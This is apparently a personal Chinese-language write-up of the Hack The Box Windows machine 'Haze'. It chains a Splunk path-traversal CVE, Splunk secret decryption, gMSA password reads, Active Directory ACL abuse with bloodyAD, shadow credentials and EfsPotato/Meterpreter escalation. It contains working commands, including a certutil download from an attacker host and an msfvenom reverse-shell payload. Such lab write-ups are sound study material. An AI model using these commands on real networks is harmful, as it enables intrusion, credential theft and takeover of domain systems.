HTB_Haze

windows(hard)

总结

user.txt

cve-2024-36991->splunksecret利用->mark-shell，属于gMSA_managers组，gmsadumper.py提示

Users or groupswho can read password for Haze-IT-Backup$: > Domain Admins

python dacledit.py haze.htb/mark.adams:'?' -target-dn 'CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb'#知晓mark对它有写入权限#mark-shellSet-ADServiceAccount -Identity "B" -PrincipalsAllowedToRetrieveManagedPassword "A"再读取其hash即可

这种方式有无远程修改的方法呢，当时没找到

WriteOnwer权限->support_services组->ForceChangePassword权限->edward-shell

root

->读取备份文件->splunk后台->splunk-shell->msf(getsystem)

关于任意文件读取时的splunk项目的敏感文件路径，除了文档，GPT可以准确提供。

bloodhound.py 报错ERROR: Could not find a domain controller. Consider specifying a domain and/or DNS server.

-d xxx.htb，不需要dc01

msldap.commons.exceptions.LDAPBindException: LDAP Bind failed! Result code: "invalidCredentials" Reason: "b'8009030C: LdapErr: DSID-0C0906AD, comment: AcceptSecurityContext error, data 52e, v4f7cx00'"

这个很奇怪了，明明hash给的是对的，休息了一会儿后，又正常了

参考

wp

https://4xura.com/ctf/htb/htb-writeup-haze

splunk文档

https://docs.splunk.com/Documentation/Splunk/9.4.1/Admin/Listofconfigurationfiles

splunk历史exp

https://advisory.splunk.com/advisories

cve-2024-36991

路径穿越引起的任意文件读取：

https://www.vicarius.io/vsociety/posts/exploiting-path-traversal-in-splunk-cve-2024-36991

https://www.sonicwall.com/blog/critical-splunk-vulnerability-cve-2024-36991-patch-now-to-prevent-arbitrary-file-reads

splunksecrets

https://github.com/HurricaneLabs/splunksecrets.git

 from cryptography.hazmat.decrepit.ciphers.algorithms import ARC4ModuleNotFoundError: No module named 'cryptography.hazmat.decrepit'$ pip show cryptographyName: cryptographyVersion: 42.0.8

但是安装了旧版的也无济于事，后来参照wp的方法，直接先进一个虚拟环境再安装requirements即可

python -m venv venvsource venv/bin/acti*pip install -r requirements.txtpip install clickpython s*s.py 就正常了

gmsadumper

https://github.com/micahvandeusen/gMSADumper.git

acl查看

https://www.thehacker.recipes/ad/movement/dacl/

查看

#1.powershellGet-ADServiceAccount -Identity 'Haze-IT-Backup' -Properties *;#2.pypython dacledit.py haze.htb/mark.adams:'?' -target-dn 'CN=?,CN=?,DC=haze,DC=htb'

设置，让A对B有某个权限

#powershellSet-ADServiceAccount -Identity "B" -PrincipalsAllowedToRetrieveManagedPassword A"

读取B的msDS-ManagedPassword

1.python ~/htb/tools/bloodyAD/blo*.py --host dc01.haze.htb -d "HAZE.HTB" --dc-ip $ip -u mark.adams -p '?' get object 'B' --attr msDS-ManagedPassword2.crackmapexec ldap $ip -u mark.adams -p '?' --gmsa3.gmsadumper.py ....

WriteOwner

https://medium.com/@offsecdeer/a-practical-guide-to-rbcd-exploitation-a3f1a47267d5

三步走了

bloodyAD改变所有权、DACL、添加进组

set oweradd genericAlladd groupMemberpython ~/htb/tools/bloodyAD/blo*.py --host dc01.haze.htb -d "HAZE.HTB" --dc-ip ip -u 'B' -p Lhash:rhash set owner 'CN=C?,CN=USERS,DC=HAZE,DC=HTB''B';... add genericAll 'CN=C?,CN=USERS,DC=HAZE,DC=HTB''B';... add groupMember 'CN=C?,CN=USERS,DC=HAZE,DC=HTB''B';

ForceChangePassword

https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword

除了用 net rpc以及 bloodAD.py 修改密码，也可以通过 ShadowCredential的方式去读取edward的原密码

依然是在成为support_services组成员后，

... add shadowCredentials 'ed?';...[+] Saved PEM certificate at path: xxxx_cert.pem[+] Saved PEM private key at path: xxxx_priv.pemopenssl pkcs12 -export -out xxxx.pfx -inkey xxxx_priv.pem -in xxxx_cert.pem  Enter Export Password: #回车即可  Verifying - Enter Export Password:sudo ntpdate $ip;certipy-ad auth -pfx xxxx.pfx -u 'edward.martin' -domain haze.htb -dc-ip $ip -debug] Got hashfor'[email protected]': aad3?04ee:....xxxx?

splunk-RCE

https://github.com/0xjpuff/reverse_shell_splunk

这怎么找到的，在github里搜索splunk shell？ 能这样搜吗？嗯？怎么想到这样搜的？回答我！还2018年的，嘶，0.0

SeImpersonatePrivilege

https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.html?highlight=SeImpersonatePrivilege#printspoofer

EfsPotato

https://github.com/zcgonvh/EfsPotato

#for 4.xcsc.exe EfsPotato.cs -nowarn:1691,618csc /platform:x86 EfsPotato.cs -nowarn:1691,618#for 2.0/3.5C:WindowsMicrosoft.NetFrameworkV3.5csc.exe EfsPotato.cs -nowarn:1691,618C:WindowsMicrosoft.NetFrameworkV3.5csc.exe /platform:x86 EfsPotato.cs -nowarn:1691,618#编译C:WindowsMicrosoft.NETFrameworkv4.0.30319csc.exe EfsPotato.cs -nowarn:1691,618usage: EfsPotato <cmd> [pipe]  pipe -> lsarpc|efsrpc|samr|lsass|netlogon (default=lsarpc)

certutil -urlcache -split -f http://kali/EfsPotato.exe C:temp

这样是下载不了的，嘶

我直接在edward-shell里用uploads上传即可

*Evil-WinRM* PS C:temp> uploads ../../htb/tools/EfsPotato.exe./EfsPotato.exe "whoami"./EfsPotato.exe "type C:\....*.txt"./EfsPotato.exe "cmd.exe"

但是不显示txt内容，也不会换新shell，那只好弄个msf了，它的getsystem自带提权了，也通过edward-shell上传到temp。

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.xxxx LPORT=3434 -f exe -o reverse.exemeterpreter > getsystemmeterpreter > cat C:\...*.txt